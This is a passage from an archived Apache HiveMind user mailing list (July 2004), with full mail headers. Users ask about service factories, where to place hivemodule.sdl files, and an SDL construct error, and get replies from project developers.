unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jul 10 16:18:25 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80682 invoked from network); 10 Jul 2004 16:18:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Jul 2004 16:18:24 -0000 Received: (qmail 87530 invoked by uid 500); 10 Jul 2004 16:18:24 -0000 Delivered-To: [email protected] Received: (qmail 87468 invoked by uid 500); 10 Jul 2004 16:18:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87453 invoked by uid 99); 10 Jul 2004 16:18:24 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO imf25aec.mail.bellsouth.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Sat, 10 Jul 2004 09:18:21 -0700 Received: from [161.129.204.104] ([161.129.204.104]) by imf25aec.mail.bellsouth.net (InterMail vM.161.129.204.104 201-253-122-130-108-20031117) with ESMTP id <20040710161820.YOIX1781.imf25aec.mail.bellsouth.net@[161.129.204.104]> for <[email protected]>; Sat, 10 Jul 2004 12:18:20 -0400 Message-ID: <[email protected]> Date: Sat, 10 Jul 2004 12:18:29 -0400 From: "Kurt R. Hoehn" <[email protected]> User-Agent: Mozilla Thunderbird 0.6 (X11/20040502) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Service creating another service Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hello, I'm trying to create a service factory that takes another service as a parameter. All the services get registered but when I try to use the service factory I have no idea how to get the parameters to the service that is a parameter to the service factory. I'm using the EJBProxy service as a model but the documentation invoke-factory (service-id=hivemind.lib.EJBProxy) { parameters (home-interface=... jndi-name=... name-lookup-service=...) } "..." does little good on how to set the parameters of name-lookup-service. If someone could enlighten me on how this is done I would greatly appreciate it. I would then like to put together a demo of what I'm trying to do, which is create an implementation of Apache OJB in Hivemind. TIA, kurt h. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jul 11 13:42:05 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72132 invoked from network); 11 Jul 2004 13:42:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Jul 2004 13:42:05 -0000 Received: (qmail 6263 invoked by uid 500); 11 Jul 2004 13:42:05 -0000 Delivered-To: [email protected] Received: (qmail 6251 invoked by uid 500); 11 Jul 2004 13:42:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6237 invoked by uid 99); 11 Jul 2004 13:42:04 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sun, 11 Jul 2004 06:42:02 -0700 Received: (qmail 7858 invoked by uid 65534); 11 Jul 2004 13:41:59 -0000 Received: from p508E0BD4.dip0.t-ipconnect.de (EHLO Unity) (161.129.204.104) by mail.gmx.net (mp012) with SMTP; 11 Jul 2004 15:41:59 +0200 X-Authenticated: #18751065 To: [email protected] Subject: Re: Service creating another service References: <[email protected]> Message-ID: <[email protected]> From: Achim Huegen <[email protected]> Content-Type: text/plain; format=flowed; charset=iso-8859-15 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Date: Sun, 11 Jul 2004 15:42:01 +0200 In-Reply-To: <[email protected]> User-Agent: Opera7.23/Win32 M2 build 3227 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I don't think I'm understanding your problem. Do you just need more information on using the name-lookup-service attribute? Maybe you could rephrase your question? Achim Huegen Am Sat, 10 Jul 2004 12:18:29 -0400 schrieb Kurt R. Hoehn <[email protected]>: > Hello, > > I'm trying to create a service factory that takes another service as > a parameter. All the services get registered but when I try to use the > service factory I have no idea how to get the parameters to the service > that is a parameter to the service factory. I'm using the EJBProxy > service as a model but the documentation > > invoke-factory (service-id=hivemind.lib.EJBProxy) > { > parameters (home-interface=... jndi-name=... name-lookup-service=...) > } "..." does little good on how to set the parameters of > name-lookup-service. > > If someone could enlighten me on how this is done I would greatly > appreciate it. I would then like to put together a demo of what I'm > trying to do, which is create an implementation of Apache OJB in > Hivemind. > > TIA, > kurt h. > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jul 11 13:57:43 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74861 invoked from network); 11 Jul 2004 13:57:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Jul 2004 13:57:43 -0000 Received: (qmail 11921 invoked by uid 500); 11 Jul 2004 13:57:43 -0000 Delivered-To: [email protected] Received: (qmail 11884 invoked by uid 500); 11 Jul 2004 13:57:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11868 invoked by uid 99); 11 Jul 2004 13:57:42 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sun, 11 Jul 2004 06:57:40 -0700 Received: (qmail 25495 invoked by uid 65534); 11 Jul 2004 13:57:37 -0000 Received: from p508E0BD4.dip0.t-ipconnect.de (EHLO Unity) (161.129.204.104) by mail.gmx.net (mp015) with SMTP; 11 Jul 2004 15:57:37 +0200 X-Authenticated: #18751065 To: [email protected] Subject: Re: Design question References: <[email protected]> Message-ID: <[email protected]> From: Achim Huegen <[email protected]> Content-Type: text/plain; format=flowed; charset=iso-8859-15 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Date: Sun, 11 Jul 2004 15:57:39 +0200 In-Reply-To: <[email protected]> User-Agent: Opera7.23/Win32 M2 build 3227 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N In deed this is an area where hivemind lacks a really smart solution. 1. You could use multiple module files. One that includes the service definition (interface only) and one for each implementation (ldap, db): <implementation service-id="com.mycorp.security.data.UserData"> <create-instance class="com.mycorp.security.data.ldap.UserDataImpl"/> </implementation> In the application you could decide which implementation file to include. But: This doesn't work very well with automatic loading hivemodule.sdl from META-INF directory (ok it works, but you must create a separate jar for each implementation). Instead you could build your registry manually (like HiveMindTestCase does) 2. Use service overriding (http://jakarta.apache.org/hivemind/override.html ) 3. Look here for a possible future solution : http://wiki.apache.org/jakarta-hivemind/ConditionalContributionsProposal Achim Huegen Am Sat, 10 Jul 2004 02:01:36 -0700 (PDT) schrieb Erik Rasmussen <[email protected]>: > First of all, thank you to those who helped me with my > previous question. I've tried posting a few thank > yous already, but they've been rejected. > > My design question is, where should I keep my > hivemodule.sdl files? > > Let's say I've got some classes that look like: > > com.mycorp.security.service.SecurityService > com.mycorp.security.service.SecurityServiceImpl > com.mycorp.security.data.UserData > com.mycorp.security.data.GroupData > com.mycorp.security.data.db.UserDataImpl > com.mycorp.security.data.db.GroupDataImpl > com.mycorp.security.data.ldap.UserDataImpl > com.mycorp.security.data.ldap.GroupDataImpl > > So I've got the business logic in SecurityServiceImpl > and it requires instances of UserData and GroupData to > run. Initially, I thought I should put the > hivemodule.sdl in: > /com/mycorp/security/hivemodule.sdl > To keep it, well, "modularized". Once I had my > security.jar, I could plug that functionality into any > application. > > But the whole point of this facade/service pattern is > that I can swap out a different implementation of > UserData and GroupData and SecurityService wouldn't > need to know. But in order to do that "swap", I have > to change hivemodule.sdl! Please don't tell me I have > to have one hivemodule.sdl per application... :-( > > What's the best/recommended solution to this? Where > should the hivemodule.sdl files live? > > Thanks, > Erik > > > > > __________________________________ > Do you Yahoo!? > New and Improved Yahoo! Mail - 100MB free storage! > http://promotions.yahoo.com/new_mail > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jul 11 15:47:48 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 955 invoked from network); 11 Jul 2004 15:47:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Jul 2004 15:47:48 -0000 Received: (qmail 3345 invoked by uid 500); 11 Jul 2004 15:47:48 -0000 Delivered-To: [email protected] Received: (qmail 3330 invoked by uid 500); 11 Jul 2004 15:47:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3317 invoked by uid 99); 11 Jul 2004 15:47:47 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO imf25aec.mail.bellsouth.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Sun, 11 Jul 2004 08:47:44 -0700 Received: from [161.129.204.104] ([161.129.204.104]) by imf25aec.mail.bellsouth.net (InterMail vM.161.129.204.104 201-253-122-130-108-20031117) with ESMTP id <20040711154737.MWLZ1781.imf25aec.mail.bellsouth.net@[161.129.204.104]> for <[email protected]>; Sun, 11 Jul 2004 11:47:37 -0400 Message-ID: <[email protected]> Date: Sun, 11 Jul 2004 11:47:47 -0400 From: "Kurt R. Hoehn" <[email protected]> User-Agent: Mozilla Thunderbird 0.6 (X11/20040502) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Service creating another service References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-15; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N No problem. I'm using the EJBProxy as a model or example to build my own service. My service has nothing to do with EJBProxy. Service A attribute one is a required string attribute two is a required string attribute three is a required string Service B implements org.apache.hivemind.ServiceImplementationFactory attribute one is a required string attribute two is required Service A service-point (id=Q interface=com.myinterface.Q ) { invoke-factory (service-id=B) { parameters ( one=default two=??? ) } } Main Program Registry registry = RegistryBuilder.constructDefaultRegistry(); Q q = (Q)registry.getService("Q", Q.class); A a = q.getA(); Attribute two in service Q is service A and that service has 3 attributes that need to be set, what is the syntax to set those 3 attributes? HTH, -kurt h Achim Huegen wrote: > I don't think I'm understanding your problem. > Do you just need more information on using the name-lookup-service > attribute? > Maybe you could rephrase your question? > > Achim Huegen > > Am Sat, 10 Jul 2004 12:18:29 -0400 schrieb Kurt R. Hoehn > <[email protected]>: > >> Hello, >> >> I'm trying to create a service factory that takes another service >> as a parameter. All the services get registered but when I try to >> use the service factory I have no idea how to get the parameters to >> the service that is a parameter to the service factory. I'm using >> the EJBProxy service as a model but the documentation >> >> invoke-factory (service-id=hivemind.lib.EJBProxy) >> { >> parameters (home-interface=... jndi-name=... >> name-lookup-service=...) >> } "..." does little good on how to set the parameters of >> name-lookup-service. >> >> If someone could enlighten me on how this is done I would greatly >> appreciate it. I would then like to put together a demo of what I'm >> trying to do, which is create an implementation of Apache OJB in >> Hivemind. >> >> TIA, >> kurt h. >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jul 11 18:39:11 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47619 invoked from network); 11 Jul 2004 18:39:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Jul 2004 18:39:11 -0000 Received: (qmail 22177 invoked by uid 500); 11 Jul 2004 18:39:11 -0000 Delivered-To: [email protected] Received: (qmail 22145 invoked by uid 500); 11 Jul 2004 18:39:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22132 invoked by uid 99); 11 Jul 2004 18:39:11 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sun, 11 Jul 2004 11:39:08 -0700 Received: (qmail 13329 invoked by uid 65534); 11 Jul 2004 18:39:02 -0000 Received: from p508E0CAC.dip0.t-ipconnect.de (EHLO Unity) (161.129.204.104) by mail.gmx.net (mp001) with SMTP; 11 Jul 2004 20:39:02 +0200 X-Authenticated: #18751065 To: [email protected] Subject: Re: Service creating another service References: <[email protected]> <[email protected]> <[email protected]> Message-ID: <[email protected]> From: Achim Huegen <[email protected]> Content-Type: text/plain; format=flowed; charset=iso-8859-15 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Date: Sun, 11 Jul 2004 20:39:03 +0200 In-Reply-To: <[email protected]> User-Agent: Opera7.23/Win32 M2 build 3227 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N This would mean, that the factory B is responsible for creating two services at once: an instance of Q and an instance of A. This is be a rather uncommon use of a service implementation factory. It is be possible to do, but the factory needs its own schema like BuilderFactory or BeanFactory. What about defining the service A which should be used by Q as a separate service point? That way it would work 'out of the box'. No need for a ServiceImplementationFactory: service-point (id=AForQ interface=A) { invoke-factory (service-id=hivemind.BuilderFactory) { construct (class=AImpl) { set (property=one value=foo) set (property=two value=foo) set (property=three value=foo) } } } service-point (id=Q interface=Q) { invoke-factory (service-id=hivemind.BuilderFactory) { construct (class=QImpl) { set-service (property=A service-id=AForQ) } } } Achim Huegen Am Sun, 11 Jul 2004 11:47:47 -0400 schrieb Kurt R. Hoehn <[email protected]>: > No problem. > > I'm using the EJBProxy as a model or example to build my own service. > My service has nothing to do with EJBProxy. Service A > attribute one is a required string > attribute two is a required string > attribute three is a required string > > Service B implements org.apache.hivemind.ServiceImplementationFactory > attribute one is a required string > attribute two is required Service A > > service-point (id=Q interface=com.myinterface.Q ) > { > invoke-factory (service-id=B) > { > parameters ( one=default two=??? ) > } > } > > Main Program > Registry registry = RegistryBuilder.constructDefaultRegistry(); > Q q = (Q)registry.getService("Q", Q.class); > A a = q.getA(); > > Attribute two in service Q is service A and that service has 3 > attributes that need to be set, what is the syntax to set those 3 > attributes? > > HTH, > -kurt h > > Achim Huegen wrote: > >> I don't think I'm understanding your problem. >> Do you just need more information on using the name-lookup-service >> attribute? >> Maybe you could rephrase your question? >> >> Achim Huegen >> >> Am Sat, 10 Jul 2004 12:18:29 -0400 schrieb Kurt R. Hoehn >> <[email protected]>: >> >>> Hello, >>> >>> I'm trying to create a service factory that takes another service >>> as a parameter. All the services get registered but when I try to use >>> the service factory I have no idea how to get the parameters to the >>> service that is a parameter to the service factory. I'm using the >>> EJBProxy service as a model but the documentation >>> >>> invoke-factory (service-id=hivemind.lib.EJBProxy) >>> { >>> parameters (home-interface=... jndi-name=... >>> name-lookup-service=...) >>> } "..." does little good on how to set the parameters of >>> name-lookup-service. >>> >>> If someone could enlighten me on how this is done I would greatly >>> appreciate it. I would then like to put together a demo of what I'm >>> trying to do, which is create an implementation of Apache OJB in >>> Hivemind. >>> >>> TIA, >>> kurt h. >>> >>> >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>> >> >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> >> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jul 12 11:41:49 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55405 invoked from network); 12 Jul 2004 11:41:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Jul 2004 11:41:49 -0000 Received: (qmail 75287 invoked by uid 500); 12 Jul 2004 11:41:48 -0000 Delivered-To: [email protected] Received: (qmail 75218 invoked by uid 500); 12 Jul 2004 11:41:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75204 invoked by uid 99); 12 Jul 2004 11:41:48 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Mon, 12 Jul 2004 04:41:45 -0700 Received: by mproxy.gmail.com with SMTP id x43so360184cwb for <[email protected]>; Mon, 12 Jul 2004 04:41:44 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v38mr89986cwb; Mon, 12 Jul 2004 04:41:44 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 12 Jul 2004 07:41:44 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Design question In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N If you don't package your descriptor as META-INF/hivemodule.sdl, then it won't automatically be picked up by the RegistryBuilder. In you case, you might want to have a single JAR with multiple modules. hivemodule.sdl can use sub-module elements to reference other modules descriptors, also packaged in META-INF, but with different names. On Sun, 11 Jul 2004 15:57:39 +0200, Achim Huegen <[email protected]> wrote: > In deed this is an area where hivemind lacks a really smart solution. > > 1. You could use multiple module files. One that includes the service > definition > (interface only) and one for each implementation (ldap, db): > > <implementation service-id="com.mycorp.security.data.UserData"> > <create-instance class="com.mycorp.security.data.ldap.UserDataImpl"/> > </implementation> > > In the application you could decide which implementation file to include. > But: This doesn't work very well with automatic loading hivemodule.sdl > from META-INF directory (ok it works, but you must create a separate jar > for each implementation). > Instead you could build your registry manually (like HiveMindTestCase does) > > 2. Use service overriding (http://jakarta.apache.org/hivemind/override.html > ) > > 3. Look here for a possible future solution : > http://wiki.apache.org/jakarta-hivemind/ConditionalContributionsProposal > > Achim Huegen > > Am Sat, 10 Jul 2004 02:01:36 -0700 (PDT) schrieb Erik Rasmussen > <[email protected]>: > > > > > First of all, thank you to those who helped me with my > > previous question. I've tried posting a few thank > > yous already, but they've been rejected. > > > > My design question is, where should I keep my > > hivemodule.sdl files? > > > > Let's say I've got some classes that look like: > > > > com.mycorp.security.service.SecurityService > > com.mycorp.security.service.SecurityServiceImpl > > com.mycorp.security.data.UserData > > com.mycorp.security.data.GroupData > > com.mycorp.security.data.db.UserDataImpl > > com.mycorp.security.data.db.GroupDataImpl > > com.mycorp.security.data.ldap.UserDataImpl > > com.mycorp.security.data.ldap.GroupDataImpl > > > > So I've got the business logic in SecurityServiceImpl > > and it requires instances of UserData and GroupData to > > run. Initially, I thought I should put the > > hivemodule.sdl in: > > /com/mycorp/security/hivemodule.sdl > > To keep it, well, "modularized". Once I had my > > security.jar, I could plug that functionality into any > > application. > > > > But the whole point of this facade/service pattern is > > that I can swap out a different implementation of > > UserData and GroupData and SecurityService wouldn't > > need to know. But in order to do that "swap", I have > > to change hivemodule.sdl! Please don't tell me I have > > to have one hivemodule.sdl per application... :-( > > > > What's the best/recommended solution to this? Where > > should the hivemodule.sdl files live? > > > > Thanks, > > Erik > > > > > > > > > > __________________________________ > > Do you Yahoo!? > > New and Improved Yahoo! Mail - 100MB free storage! > > http://promotions.yahoo.com/new_mail > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 00:20:38 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96133 invoked from network); 14 Jul 2004 00:20:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 00:20:38 -0000 Received: (qmail 20702 invoked by uid 500); 14 Jul 2004 00:20:37 -0000 Delivered-To: [email protected] Received: (qmail 20687 invoked by uid 500); 14 Jul 2004 00:20:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20674 invoked by uid 99); 14 Jul 2004 00:20:37 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.mckhboc.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 13 Jul 2004 17:20:36 -0700 Received: from 161.129.204.104 by mail1.mckhboc.com with ESMTP (Outbound Mail1 SMTP Relay (MMS v5.6.1)); Tue, 13 Jul 2004 17:20:30 -0700 X-Server-Uuid: E618535E-AE39-475D-9091-BC1AF22CB2F2 Received: by smtpout.hboc.com with Internet Mail Service (5.5.2653.19) id <N5TGZF8T>; Tue, 13 Jul 2004 20:20:42 -0400 Received: from atlexc91nthub.hboc.com (ims2.mckesson.com [161.129.204.104] ) by atlexcsmtpb.hboc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N5TGZF8R; Tue, 13 Jul 2004 20:20:39 -0400 Received: by ims2.mckesson.com with Internet Mail Service (5.5.2653.19) id <364CXGJS>; Tue, 13 Jul 2004 20:21:33 -0400 From: "Hensley, Richard" <[email protected]> To: "'[email protected]'" <[email protected]> Message-ID: <[email protected]> Subject: Trying to use a service constructor Date: Tue, 13 Jul 2004 20:20:14 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) X-WSS-ID: 6CEAA3C41SO415730-01-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I have a hivemodule.sdl configuration that looks like: module (id=com.mckesson.adept.net version="1.0.0") { service-point (id=ClientController interface=com.mckesson.adept.net.Controller) { invoke-factory (service-id=hivemind.BuilderFactory model=singleton) { construct (class=com.mckesson.adept.net.client.ClientController) { string { "${com.mckesson.adept.broker.host}" } int { "${com.mckesson.adept.broker.port}" } } } } service-point (id=Controller interface=com.mckesson.adept.net.Controller) { invoke-factory (service-id=hivemind.BuilderFactory model=singleton) { construct (class=com.mckesson.adept.net.client.ConnectionPoolingController) { service { ClientController } } } } } When I use the following code: Controller controller = (Controller) reg.getService( "com.mckesson.adept.net.ClientController", Controller.class); Everything works great. When I use the following code: Controller controller = (Controller) reg.getService( "com.mckesson.adept.net.Controller", Controller.class); Hivemind gives me the following exception: Jul 13, 2004 5:18:50 PM org.apache.hivemind.impl.DefaultErrorHandler error SEVERE: Error at file:/C:/dev900/java/adept/target/classes/META-INF/hivemodule.sdl, line 21, column 43: Element construct/service/ClientController is not allowed here. org.apache.hivemind.ApplicationRuntimeException: Unable to construct service com.mckesson.adept.net.Controller: java.lang.NullPointerException at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructNewS erviceImplementation(AbstractServiceModelImpl.java:156) at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructServ iceImplementation(AbstractServiceModelImpl.java:130) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getActualService Implementation(SingletonServiceModel.java:69) at $InnerProxy_fdbb040d47_3._service($InnerProxy_fdbb040d47_3.java) at $InnerProxy_fdbb040d47_3.brokerConnection($InnerProxy_fdbb040d47_3.java) at $SingletonProxy_fdbb040d29_2.brokerConnection($SingletonProxy_fdbb040d29_2.j ava) at com.mckesson.adept.net.HiveMindDemo.main(HiveMindDemo.java:21) org.apache.hivemind.ApplicationRuntimeException: Unable to construct service com.mckesson.adept.net.Controller: java.lang.NullPointerException at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructNewS erviceImplementation(AbstractServiceModelImpl.java:156) at org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl.constructServ iceImplementation(AbstractServiceModelImpl.java:130) at org.apache.hivemind.impl.servicemodel.SingletonServiceModel.getActualService Implementation(SingletonServiceModel.java:69) at $InnerProxy_fdbb040d47_3._service($InnerProxy_fdbb040d47_3.java) at $InnerProxy_fdbb040d47_3.shutdown($InnerProxy_fdbb040d47_3.java) at $SingletonProxy_fdbb040d29_2.shutdown($SingletonProxy_fdbb040d29_2.java) at com.mckesson.adept.net.HiveMindDemo.main(HiveMindDemo.java:33) Exception in thread "main" I really don't know why, but I suspect it is because I'm not using the service element correctly in the contruct element for the BuilderFactory. Can anybody give me some insight as to what might be wrong? Richard Hensley --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 14 02:23:13 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36149 invoked from network); 14 Jul 2004 02:23:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 14 Jul 2004 02:23:13 -0000 Received: (qmail 13101 invoked by uid 500); 14 Jul 2004 02:23:13 -0000 Delivered-To: [email protected] Received: (qmail 13089 invoked by uid 500); 14 Jul 2004 02:23:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13073 invoked by uid 99); 14 Jul 2004 02:23:12 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 13 Jul 2004 19:23:09 -0700 Received: by mproxy.gmail.com with SMTP id x71so2401454cwb for <[email protected]>; Tue, 13 Jul 2004 19:23:05 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v3mr157603cwb; Tue, 13 Jul 2004 19:23:05 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 13 Jul 2004 22:23:05 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Trying to use a service constructor In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N To SDL, that ClientController looks like a ClientController element. You need to put it in quotes for it to realize its literal character data. Character data is always enclosed in quotes in SDL. On Tue, 13 Jul 2004 20:20:14 -0400, Hensley, Richard <[email protected]> wrote: > I have a hivemodule.sdl configuration that looks like: > > module (id=com.mckesson.adept.net version="1.0.0") > { > service-point (id=ClientController > interface=com.mckesson.adept.net.Controller) > { > invoke-factory (service-id=hivemind.BuilderFactory model=singleton) > { > construct (class=com.mckesson.adept.net.client.ClientController) > { > string { "${com.mckesson.adept.broker.host}" } > int { "${com.mckesson.adept.broker.port}" } > } > } > } > > service-point (id=Controller interface=com.mckesson.adept.net.Controller) > { > invoke-factory (service-id=hivemind.BuilderFactory model=singleton) > { > construct > (class=com.mckesson.adept.net.client.ConnectionPoolingController) > { > service { ClientController } > } > } > } > } > > When I use the following code: > > Controller controller = (Controller) reg.getService( > "com.mckesson.adept.net.ClientController", > Controller.class); > > Everything works great. > > When I use the following code: > > Controller controller = (Controller) reg.getService( > "com.mckesson.adept.net.Controller", Controller.class); > > Hivemind gives me the following exception: > > Jul 13, 2004 5:18:50 PM org.apache.hivemind.impl.DefaultErrorHandler error 